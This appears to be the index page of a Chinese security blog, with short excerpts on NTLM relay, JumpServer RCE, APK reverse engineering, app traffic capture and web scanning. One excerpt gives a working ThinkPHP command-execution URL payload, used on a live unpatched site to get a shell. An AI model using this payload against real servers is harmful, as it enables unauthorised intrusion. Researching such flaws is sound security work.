0x24bin's Blog

背景: 适用于由GRUB引导的CentOS,Ubuntu,Debian系统.   使用官方发行版去掉模板预装的软件.   同时也可以解决内核版本与软件不兼容的问题。   只要有root权限,还您一个纯净的系统。 相关文章: [ Linux Shell ] 通用无限制在 Linux VPS 上一键全自动 dd 安装 Windows 注意: 全自动安装默认root密码:MoeClub.org 安装完成后请立即更改密码. 能够全自动重装Debian/Ubun...

0x00 前言 最近edwardz(彭博)提交了个jumpserver的未授权rce，可以说是非常精彩，复现下来后发现确实是一个很经典的伪随机例子，这也是我一直想写但是找不出合适例子做教学的一套组合拳，现在正好借这个漏洞来写一写。 0x01 前置知识 在讲具体漏洞之前，我们先要了解一下伪随机数的概念。什么是伪随机数呢？在C语言或者其他类似语言里，经常会看到类似的代码： 这里其实就是基础的随机数的使用，一般是先...

Android逆向之旅---动态方式破解apk进阶篇(IDA调试so源码) 来源 https://blog.csdn.net/jiangwei0910410003/article/details/51500328 一、前言 今天我们继续来看破解apk的相关知识，在前一篇：Eclipse动态调试smali源码破解apk 我们今天主要来看如何使用IDA来调试Android中的native源码，因为现在一些app，为了安全或者效率问题，会把一些重要的功能放到native层，那么这样一来，我们前篇说到的Eclip...

一、简介 不得不说，随着时代的发展，游戏产业在近几年的互联网潮流中越来越扮演者重要的地位，与之而来的不仅有网络游戏公司的春天，还有游戏灰色产业的暗流涌动。在游戏产业的发展中，诞生了一大批所谓的“外x挂”开发人员，他们不断的利用游戏的漏洞，在违法牟利的同时，也促进了游戏安全行业的进步。 同时，在游戏安全的对抗中，诞生了以下几种技术以防止游戏作弊的发生： ⒈数据检测：对基础的游戏数据进...

1. 什么是前后端分离 从职责上区分： 负责交互与展示的部分为前端； 负责提供数据，处理业务的部分为后端。 核心思想是前端html页面通过ajax调用后端的restuful api接口并使用json数据进行交互。 2. 前后端分离架构的优势 1）提高工作效率，分工更加明确 前端只关注前端的事，后端只关心后端的活，两者开发可以同时进行。在后端还没有提供接口的时候，前端可以先通过Mock的方式模拟接口数据。页面的增加和...

作者：天融信阿尔法实验室 一、漏洞概述 2019年6月，Microsoft发布了一条安全更新。该更新针对CVE-2019-1040漏洞进行修复。此次漏洞，攻击者可以通过中间人攻击，绕过NTLM MIC（消息完整性检查）保护，将身份验证流量中继到目标服务器。 通过这种攻击使得攻击者在仅有一个普通域账号的情况下可以远程控制 Windows 域内的任何机器，包括域控服务器。 二、漏洞利用 攻击方式一：Exchange 验证环境： 角色 ...

注：本文为“小米安全中心”原创，转载请联系“小米安全中心” 上期回顾：HTTPS原理科普 Web扫描平台的发展 1.原始社会 在Web安全兴起的初期，国内的工具相应缺乏，笔者曾经获取一个注入点数据库的MD5需要手工注入半天时间。 于是相应的安全扫描自动化工具应运而生，其中杰出代表莫过于啊D，穿山甲，和JSKY。感谢前辈给我们创造的自动化工具。这几款工具，可以列入中国网络安全的发展历史。 2.拿来主义 国内乙...

APP抓包问题已经是老生常谈的一个问题了，今天正好碰到这个问题，经过一番折腾最终解决了这个问题。   先解决安卓7手机/模拟器正常抓包问题： 1、先把burp的der证书导出 2、使用opensl对证书进行相应的配置 将der转换成pem，命令如下： 1 openssl x509 -inform DER -in cacert.der -out cacert.pem 3、查看pem证书的hash值并记录，命令如下： 1 openssl x509 -inform PEM -sub...

起因 thinkPHP 的命令执行漏洞已经过去好一阵子了，然而还有许多站并没有修复这个漏洞，今天恰巧让我遇到这么一个， 但是因为目标 PHP 版本是 7.2.14 导致 GETSHELL 变的异常麻烦，在各种折腾下最终成功，记录分享一波~ GETSHELL 过程 ?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami?s=index/\think\Request/input&filter=phpinfo&...